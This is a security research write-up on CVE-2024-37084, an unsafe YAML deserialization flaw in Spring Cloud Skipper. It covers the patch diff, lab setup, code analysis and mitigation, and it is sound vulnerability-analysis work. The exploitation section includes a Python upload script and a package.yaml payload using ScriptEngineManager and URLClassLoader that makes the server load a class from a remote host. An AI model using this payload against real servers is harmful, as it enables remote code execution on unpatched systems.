CVE-2024-37084 is a critical security vulnerability in Spring Cloud Skipper, specifically related to how the application processes YAML input. The vulnerability arises from the use of the standard Yaml constructor, which allows for the deserialization of arbitrary objects. This flaw could be exploited by an attacker providing malicious YAML data, potentially leading to remote code execution. The vulnerability affects versions 2.11.0 through 2.11.3 of Spring Cloud Skipper. A patch was introduced that replaces the standard constructor with SafeConstructor, which restricts deserialization to safe object types, preventing the execution of harmful code. Additionally, custom constructors and enhanced test coverage were implemented to ensure the security and integrity of YAML processing within the application.
What is Spring Cloud ?
Spring Cloud Dataflow is a comprehensive toolkit designed for building and orchestrating data pipelines in a micro-services architecture. It is part of the Spring ecosystem and focuses on enabling real-time and batch data processing. The platform allows developers to create, deploy, and manage data processing workflows that can handle various data integration and processing tasks, such as ETL (Extract, Transform, Load) operations, stream processing, and event-driven data handling.
Patch Diffing
The patch for CVE-2024-37084, detailed on GitHub, addresses security vulnerabilities in YAML processing within Spring Cloud Skipper. The changes impact several files, introducing SafeConstructor to ensure secure YAMLdeserialization and creating custom constructors for specific data types.
Usage of SafeConstructor
List of updated files:
- ReleaseReportService.java
- ArgumentSanitizer.java
- ManifestUtils.java
- BaseDocumentation.java
- ConfigValueUtilsTests.java
- ManifestCommands.java
- DefaultPackageReader.java
- DefaultPackageWriter.java
- DefaultYamlConverter.java
- PackageWriterTests.java
Before the patch, these files utilized standard constructors for YAML processing. The constructors were insufficiently secure, leaving the system vulnerable to potential exploits, such as arbitrary code execution. The patch replaces these constructors with SafeConstructor, a secure alternative that ensures only safe objects are instantiated during YAMLdeserialization. This change is crucial in preventing malicious code from being executed, particularly when processing untrusted YAML inputs.
Custom Constructor for PackageMetadata
List of updated files:
- PackageMetadataSafeConstructor.java
A new custom constructor, PackageMetadataSafeConstructor, is introduced for safely deserializing PackageMetadata objects. This constructor ensures that the deserialization process adheres strictly to expected data structures and types, reducing the risk of security vulnerabilities related to deserialization. This tailored approach is particularly important for processing sensitive data like package metadata, where the integrity and security of the data must be maintained.
Enhanced Test Coverage
List of updated files:
- PackageMetadataSafeConstructorTests.java
- PackageWriterTests.java
The patch enhances test coverage by introducing new tests in PackageMetadataSafeConstructorTests.java and updating existing ones in PackageWriterTests.java. These tests verify the correct and secure handling of YAML input using the newly introduced SafeConstructor and custom constructors. The tests ensure that the system behaves correctly under both normal and malicious input scenarios, providing additional assurance that the patch effectively mitigates the identified vulnerabilities.
Before vs After Patch
Before Patch:
- YAML processing across multiple files was handled using basic constructors. These constructors were not secure, exposing the system to risks such as arbitrary code execution or data manipulation if the YAML input was crafted maliciously.
After Patch:
- The introduction of SafeConstructor across all relevant files ensures that YAML deserialization is secure, significantly reducing the potential for security vulnerabilities. Additionally, custom constructors like PackageMetadataSafeConstructor provide specialized security measures for specific data types. As The patch also includes enhanced testing to validate the effectiveness of these changes.
Lab Setup
The affected versions are 2.11.x & 2.10.x, So for the lab setup any version before 2.11.x & 2.10.x would work for us for the analysis. I am using 2.11.0 for the analysis. Under spring-cloud-dataflow-2.11.0/src/docker-compose, We can find docker-compose.yml file, We will add JAVA_TOOL_OPTIONS=-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005 to the environment section under skipper-server, So we can debug it during the dynamical analysis:
Now, Let’s deploy our lab:
sudo docker-compose up -d
Here, We can see the dashboard:
And Skipper Server API:
The Analysis
When we first view the upload method from /Users/labatrixmacenv/Desktop/spring-cloud-dataflow-2.11.0/spring-cloud-skipper/spring-cloud-skipper-server-core/src/main/java/org/springframework/cloud/skipper/server/service/PackageService.java:
@Transactional
public PackageMetadata upload(UploadRequest uploadRequest) {
validateUploadRequest(uploadRequest);
Repository localRepositoryToUpload = getRepositoryToUpload(uploadRequest.getRepoName());
Path packageDirPath = null;
try {
packageDirPath = TempFileUtils.createTempDirectory("skipperUpload");
File packageDir = new File(packageDirPath + File.separator + uploadRequest.getName());
packageDir.mkdir();
Path packageFile = Paths
.get(packageDir.getPath() + File.separator + uploadRequest.getName() + "-"
+ uploadRequest.getVersion() + "." + uploadRequest.getExtension());
Assert.isTrue(packageDir.exists(), "Package directory doesn't exist.");
Files.write(packageFile, uploadRequest.getPackageFileAsBytes());
ZipUtil.unpack(packageFile.toFile(), packageDir);
String unzippedPath = packageDir.getAbsolutePath() + File.separator + uploadRequest.getName()
+ "-" + uploadRequest.getVersion();
File unpackagedFile = new File(unzippedPath);
Assert.isTrue(unpackagedFile.exists(), "Package is expected to be unpacked, but it doesn't exist");
Package packageToUpload = this.packageReader.read(unpackagedFile);
PackageMetadata packageMetadata = packageToUpload.getMetadata();
if (!packageMetadata.getName().equals(uploadRequest.getName())
|| !packageMetadata.getVersion().equals(uploadRequest.getVersion())) {
throw new SkipperException(String.format("Package definition in the request [%s:%s] " +
"differs from one inside the package.yml [%s:%s]",
uploadRequest.getName(), uploadRequest.getVersion(),
packageMetadata.getName(), packageMetadata.getVersion()));
}
if (localRepositoryToUpload != null) {
packageMetadata.setRepositoryId(localRepositoryToUpload.getId());
packageMetadata.setRepositoryName(localRepositoryToUpload.getName());
}
packageMetadata.setPackageFile(new PackageFile((uploadRequest.getPackageFileAsBytes())));
return this.packageMetadataRepository.save(packageMetadata);
}
catch (IOException e) {
throw new SkipperException("Failed to upload the package.", e);
}
finally {
if (packageDirPath != null && !FileSystemUtils.deleteRecursively(packageDirPath.toFile())) {
logger.warn("Temporary directory can not be deleted: " + packageDirPath);
}
}
}
Static Analysis
Let’s analyze the upload() method:
Validation and Repository Retrieval
validateUploadRequest(uploadRequest);
Repository localRepositoryToUpload = getRepositoryToUpload(uploadRequest.getRepoName());
The method begins by validating the UploadRequest object through a call to validateUploadRequest(uploadRequest);. and then Repository localRepositoryToUpload = getRepositoryToUpload(uploadRequest.getRepoName());
retrieves the repository where the package will be uploaded. And we can discover the existing repositories through /api/repositories.
Temporary Directory Creation
Path packageDirPath = TempFileUtils.createTempDirectory("skipperUpload");
File packageDir = new File(packageDirPath + File.separator + uploadRequest.getName());
packageDir.mkdir();
A temporary directory is created using TempFileUtils.createTempDirectory(“skipperUpload”);. This directory serves as a workspace where the package file will be processed. The directory is created with a unique name to avoid conflicts. A subdirectory named after the package is then created within this temporary directory using File packageDir = new File(packageDirPath + File.separator + uploadRequest.getName());. The mkdir() call physically creates this subdirectory on the file system.
Package File Creation and Writing
Path packageFile = Paths.get(packageDir.getPath() + File.separator + uploadRequest.getName() + "-" + uploadRequest.getVersion() + "." + uploadRequest.getExtension());
Assert.isTrue(packageDir.exists(), "Package directory doesn't exist.");
Files.write(packageFile, uploadRequest.getPackageFileAsBytes());
The full path for the package file is constructed using Paths.get(), which combines the directory path, package name, version, and file extension. This path points to where the uploaded package will be stored. The method then verifies that the package directory exists using Assert.isTrue(packageDir.exists(), “Package directory doesn’t exist.”);. This is a safety check to ensure that the package can be written to the correct location. Finally, the package file is written to disk using Files.write(packageFile, uploadRequest.getPackageFileAsBytes());, where the byte content of the file is obtained from the uploadRequest.
Unpacking and Validating the Package
ZipUtil.unpack(packageFile.toFile(), packageDir);
String unzippedPath = packageDir.getAbsolutePath() + File.separator + uploadRequest.getName() + "-" + uploadRequest.getVersion();
File unpackagedFile = new File(unzippedPath);
Assert.isTrue(unpackagedFile.exists(), "Package is expected to be unpacked, but it doesn't exist");
The package file, assumed to be a ZIP file, is unpacked into the temporary directory using ZipUtil.unpack(). This step extracts the contents of the package so they can be further processed. The path to the unpacked content is constructed and stored in unzippedPath. The method then checks whether the unpacked content exists using Assert.isTrue(unpackagedFile.exists(), “Package is expected to be unpacked, but it doesn’t exist”);. This ensures that the unpacking process was successful and that the package contents are available for further processing.
Reading Package Metadata
Package packageToUpload = this.packageReader.read(unpackagedFile);
PackageMetadata packageMetadata = packageToUpload.getMetadata();
if (!packageMetadata.getName().equals(uploadRequest.getName()) || !packageMetadata.getVersion().equals(uploadRequest.getVersion())) {
throw new SkipperException(String.format("Package definition in the request [%s:%s] differs from one inside the package.yml [%s:%s]",
uploadRequest.getName(), uploadRequest.getVersion(), packageMetadata.getName(), packageMetadata.getVersion()));
}
The unpacked package is read by calling this.packageReader.read(unpackagedFile);, which parses a file package.yml to extract metadata about the package. The extracted metadata is then compared with the information provided in the uploadRequest. If there is a discrepancy between the requested package name/version and what is found inside the package, an exception is thrown. This validation step ensures that the package content matches what the user intended to upload.
packageReader.read
When we go to read() method from packageReader, We can see the following:
We can see in DefaultPackageReader.java, It ipleents PackageRedaer. Now, when we go to spring-cloud-dataflow-2.11.0/spring-cloud-skipper/spring-cloud-skipper/src/main/java/org/springframework/cloud/skipper/io/DefaultPackageReader.java, We can see the read() method:
Basically, The read() method is responsible for loading a package from a given directory, processing various types of files within that directory, and constructing a Package object. The method handles package metadata, configuration values, templates, and dependent packages, among other things. Let’s Analyze it:
Input Validation
Assert.notNull(packageDirectory, "File to load package from can not be null");
The method begins by ensuring that the packageDirectory is not null.
Walking the Directory
List<File> files;
try (Stream<Path> paths = Files.walk(Paths.get(packageDirectory.getPath()), 1)) {
files = paths.map(i -> i.toAbsolutePath().toFile()).collect(Collectors.toList());
}
catch (IOException e) {
throw new SkipperException("Could not process files in path " + packageDirectory.getPath() + ". " + e.getMessage(), e);
}
Here the method walking through the directory using Files.walk(), which generates a stream of file paths within the directory, limited to a depth of 1. This ensures that only the immediate contents of the directory, and not any subdirectories, are explored. The paths are then converted to absolute File objects and collected into a list, which will later be iterated over to process each file. If an IOException occurs during this process, it is caught, and a custom SkipperException is thrown, providing a detailed error message that includes the directory path.
Package Initialization
Package pkg = new Package();
List<FileHolder> fileHolders = new ArrayList<>();
After that, It initializes a new Package object, pkg, Which will eventually hold the metadata, configuration, templates, and other relevant package information. Additionally, a list of FileHolder objects is initialized to store references to specific files, particularly manifest files, within the package.
Files Processing
if (file.getName().equalsIgnoreCase("package.yaml") || file.getName().equalsIgnoreCase("package.yml")) {
pkg.setMetadata(loadPackageMetadata(file));
continue;
}
The method iterates over the list of files, handling each based on its type and purpose within the package. It first looks for a file named package.yaml or package.yml, which typically contains the package’s metadata. If such a file is found, it is loaded into the Package object using the loadPackageMetadata(file) method, and the loop continues to the next file.
if (file.getName().endsWith("manifest.yaml") || file.getName().endsWith("manifest.yml")) {
fileHolders.add(loadManifestFile(file));
continue;
}
Next, the method checks for files ending in manifest.yaml or manifest.yml, which are likely used to define the structure or content of the package. These files are processed and stored in fileHolders using the loadManifestFile(file) method.
if (file.getName().equalsIgnoreCase("values.yaml") || file.getName().equalsIgnoreCase("values.yml")) {
pkg.setConfigValues(loadConfigValues(file));
continue;
}
The method then looks for configuration files named values.yaml or values.yml, which contain configuration values. These values are loaded into the Package object using the loadConfigValues(file) method.
final File absoluteFile = file.getAbsoluteFile();
if (absoluteFile.isDirectory() && absoluteFile.getName().equals("templates")) {
pkg.setTemplates(loadTemplates(file));
continue;
}
Following this, the method checks if the file is a directory named templates, which likely contains template files. If found, the templates are loaded into the Package object using the loadTemplates(file) method.
if ((file.getName().equalsIgnoreCase("packages") && file.isDirectory())) {
File[] dependentPackageDirectories = file.listFiles();
List<Package> dependencies = new ArrayList<>();
for (File dependentPackageDirectory : dependentPackageDirectories) {
dependencies.add(read(dependentPackageDirectory));
}
pkg.setDependencies(dependencies);
}
Finally, the method checks if the file is a directory named packages, which likely contains dependent packages. The method recursively calls read(dependentPackageDirectory) for each directory within packages, building a list of dependent Package objects. These dependencies are then added to the Package object.
Finalizing the Package
if (!fileHolders.isEmpty()) {
pkg.setFileHolders(fileHolders);
}
return pkg;
If any manifest files were found and processed, they are added to the Package object using pkg.setFileHolders(fileHolders);. Finally, the fully populated Package object, containing all relevant metadata, configuration values, templates, and dependencies, is returned.
loadPackageMetadata
When we go to loadPackageMetadata(), Where it’s triaged when the file is package.yaml is matched. Basically, The loadPackageMetadata() method is designed to read a YAML file and convert its contents into a PackageMetadataobject & handles file reading, YAML parsing, and object mapping while ensuring that any missing properties in the YAML file do not cause errors during the object creation.
DumperOptions options = new DumperOptions();
Representer representer = new Representer(options);
representer.getPropertyUtils().setSkipMissingProperties(true);
LoaderOptions loaderOptions = new LoaderOptions();
Yaml yaml = new Yaml(new Constructor(PackageMetadata.class, loaderOptions), representer);
The method begins by setting up YAML parser options by initializing a DumperOptions object and a Representerobject, where the Representer is configured to skip any missing properties when mapping YAML data to the Java object. This setup ensures that if a property is missing from the YAML file, it won’t cause an error, and the corresponding field in the PackageMetadata object will remain uninitialized. The LoaderOptions object is then configured, and a Yaml object is created with a custom constructor to map the YAML content directly into a PackageMetadata class.
String fileContents = null;
try {
fileContents = FileUtils.readFileToString(file);
}
catch (IOException e) {
throw new SkipperException("Error reading yaml file", e);
}
Following this setup, the method reads the YAML file contents into a string using FileUtils.readFileToString(file), simplifying the process of converting the entire file content into a string. If an IOException occurs during this process, the method catches the exception and throws a custom SkipperException with a relevant error message.
PackageMetadata pkgMetadata = (PackageMetadata) yaml.load(fileContents);
Finally, the string content of the YAML file is parsed using the yaml.load(fileContents) method, converting the YAML data into a PackageMetadata object, provided the class structure matches the YAML file’s structure.
And in this method the issue arises during the YAML content parsing and deserialization into a PackageMetadata object. The method sets up a YAML parser using a Constructor configured to map YAML content directly to the PackageMetadata class, which is risky when dealing with untrusted input. Specifically, the code section yaml.load(fileContents); is where the deserialization happens, and if the YAML file contains special tags like !!javax.script.ScriptEngineManager, the parser will attempt to create instances of these Java classes, potentially leading to the execution of arbitrary code, such as loading and running a remote Java class. This lack of restriction or filtering in the deserialization process makes the method vulnerable to Remote Code Execution (RCE), as it allows potentially dangerous YAML tags to be processed without proper safeguards.
package.yaml content
Now, to understand what we will include in package.yaml or the file contains, We already know that loadPackageMetadata is type of PackageMetadata, When we go to spring-cloud-dataflow-2.11.0/spring-cloud-skipper/spring-cloud-skipper/src/main/java/org/springframework/cloud/skipper/domain/PackageMetadata.java:
public class PackageMetadata extends AbstractEntity {
/**
* The Package Index spec version this file is based on.
* we enforce apiVersion during package creation.
*/
@NotNull
private String apiVersion;
/**
* Indicates the origin of the repository (free form text).
*/
private String origin;
/**
* The repository ID this Package belongs to.
*/
@NotNull
private Long repositoryId;
/**
* The repository name this Package belongs to.
*/
@NotNull
private String repositoryName;
/**
* What type of package system is being used.
*/
@NotNull
private String kind;
/**
* The name of the package
*/
@NotNull
private String name;
/**
* The display name of the package
*/
private String displayName;
/**
* The version of the package
*/
@NotNull
private String version;
/**
* Location to source code for this package.
*/
@Lob
// @Column(columnDefinition = "text")
private String packageSourceUrl;
/**
* The home page of the package
*/
@Lob
// @Column(columnDefinition = "text")
private String packageHomeUrl;
We can see this all the parameters and attributes that can be used or is used in package.yaml:
We can confirm this and see that displayName is one of the parameters, it’s been returned from the file through getDisplayName() method. And also the same as other parameters and attributes.
Static Analysis Summary
Dynamic Analysis
Now, let’s perform dynamic analysis to confirm our findings.
After adding Remote JVM Debug, we proceed with the configuration:
Next, we set a breakpoint on the upload method.
We will send a request using the following Python code:
import requests
import json
def zip_to_byte_array(zip_file_path):
"""
Converts a ZIP file to a list of integers representing the byte array.
:param zip_file_path: The path to the ZIP file.
:return: List of integers representing the ZIP file as a byte array.
"""
with open(zip_file_path, 'rb') as zip_file:
return list(zip_file.read())
def upload_package(url, repo_name, package_name, version, extension,
package_file_as_bytes):
"""
Sends a POST request to the given URL with the upload package request
body.
:param url: The URL to send the request to.
:param repo_name: The repository name where the package will be
uploaded.
:param package_name: The name of the package.
:param version: The version of the package.
:param extension: The file extension of the package (should be 'zip').
:param package_file_as_bytes: The list of integers representing the
byte array of the package file.
:return: The response from the server.
"""
upload_request = {
"repoName": repo_name,
"name": package_name,
"version": version,
"extension": extension,
"packageFileAsBytes": package_file_as_bytes
}
headers = {
'Content-Type': 'application/json'
}
response = requests.post(url, headers=headers,
data=json.dumps(upload_request))
return response
if __name__ == "__main__":
# Define the parameters
repo_name = "local"
package_name = "thePoc"
version = "1.0.0"
extension = "zip"
zip_file_path = "thePoc.zip"
# Convert the ZIP file to a list of integers (byte array)
package_file_as_bytes = zip_to_byte_array(zip_file_path)
# URL to send the request to
url = "http://127.0.0.1:7577/api/package/upload"
# Upload the package
response = upload_package(url, repo_name, package_name, version,
extension, package_file_as_bytes)
# Print the response from the server
print(f"Status Code: {response.status_code}")
print(f"Response Body: {response.text}")
The contents of the package.yaml file we are going to compress are as follows:
repositoryId: 1
kind: test
repositoryName: local
apiVersion: 1.0.0
version: 1.0.0
origin: thePoc
displayName: JustaPoC
name: thePoc
Let’s compress the file, send the request, and start debugging the flaw.
When we hit our breakpoint, we begin our debugging process.
After validating the request and checking if the repository exists, the method creates a temporary directory /tmp/skipperUpload5366669604351457826 for the upload.
Next, a path for our zip file is created, and it is written using Files.write. We can see that the file name includes the version and the name provided in the request.
Our zip file is then unzipped using ZipUtil.unpack, and a full path is generated: /tmp/skipperUpload5366669604351457826/thePoc/thePoc-1.0.0. The method checks whether this path exists using Assert.isTrue(unpackagedFile.exists(), “Package is expected to be unpacked, but it doesn’t exist”);.
In our case, the path /tmp/skipperUpload5366669604351457826/thePoc/thePoc-1.0.0 was not found. This makes sense since we did not include a folder named thePoc-1.0.0 in the package we uploaded, so the read() method was not triggered. Let’s fix this and continue debugging.
Now, we see that no exception is thrown as the path is found, and the read() method is triggered.
We step into the read() method and continue our analysis.
Upon iterating over the files and reaching package.yaml, we observe that the loadPackageMetadata method is triggered.
We can see that it successfully loaded all of our parameters and attributes with the values we provided, and the loadPackageMetadata method completes its execution.
Dynamic Analysis Summary
Exploitation
For the exploitation part, After reading snyk blog post on Unsafe deserialization vulnerability in SnakeYaml (CVE-2022-1471). We can use the following payload
!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://localhost:8080/"]]]]
It leverages the ability of the YAML parser to deserialize the YAML content directly into Java objects. When this YAML is parsed by a vulnerable YAML parser, it will attempt to instantiate a ScriptEngineManager, which then uses the URLClassLoader to load and execute classes from the specified URL (http://localhost:8080/). Let’s Test it against our target.
package.yaml:
repositoryId: 1
repositoryName: local
apiVersion: 1.0.0
version: 1.0.0
kind: test
origin: thePoc
displayName: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://192.168.0.103:1339/poc"]]]]
name: thePoc
output:
CVE_2024_37084 % python3 -m http.server 1339
Serving HTTP on :: port 1339 (http://[::]:1339/) ...
::ffff:192.168.0.103 - - [30/Aug/2024 17:34:41] code 404, message File not found
::ffff:192.168.0.103 - - [30/Aug/2024 17:34:41] "GET /poc HTTP/1.1" 404 -
Here we can see clearly, It works successfully.
Mitigation
Product | Affected Version(s) | Fix Version | Mitigation |
Spring Cloud Skipper | 2.11.0 – 2.11.3 | 2.11.4 | Users of affected versions should upgrade to the corresponding fixed version. |
This table provides a clear and concise summary of the mitigation steps for the vulnerability in Spring Cloud Skipperversions 2.11.0 to 2.11.3.
Conclusion
This vulnerability arises from the use of a standard Yaml constructor, which permits the deserialization of arbitrary objects. This flaw exposes systems to potential remote code execution (RCE) attacks if malicious YAML data is provided. Through both static and dynamic analysis, it was observed that the vulnerable method allows the processing of YAML input without sufficient safeguards, enabling attackers to inject and execute arbitrary code via carefully crafted payloads. For example, the use of the !!javax.script.ScriptEngineManager tag, combined with a URLClassLoader, allows malicious classes to be loaded and executed remotely, highlighting the severe impact of this vulnerability.
References
- https://dataflow.spring.io/docs/
- https://dataflow.spring.io/docs/installation/local/docker/
- https://docs.spring.io/spring-cloud-dataflow/docs/current/reference/htmlsingle/#api-guide
- https://spring.io/projects/spring-cloud-skipper#learn
- https://github.com/spring-cloud/spring-cloud-dataflow/commit/bcb060d8ba985a851a1efb15bcc85653293b7eef?diff=split&w=1
- https://snyk.io/blog/unsafe-deserialization-snakeyaml-java-cve-2022-1471/
- https://github.com/spring-cloud/spring-cloud-dataflow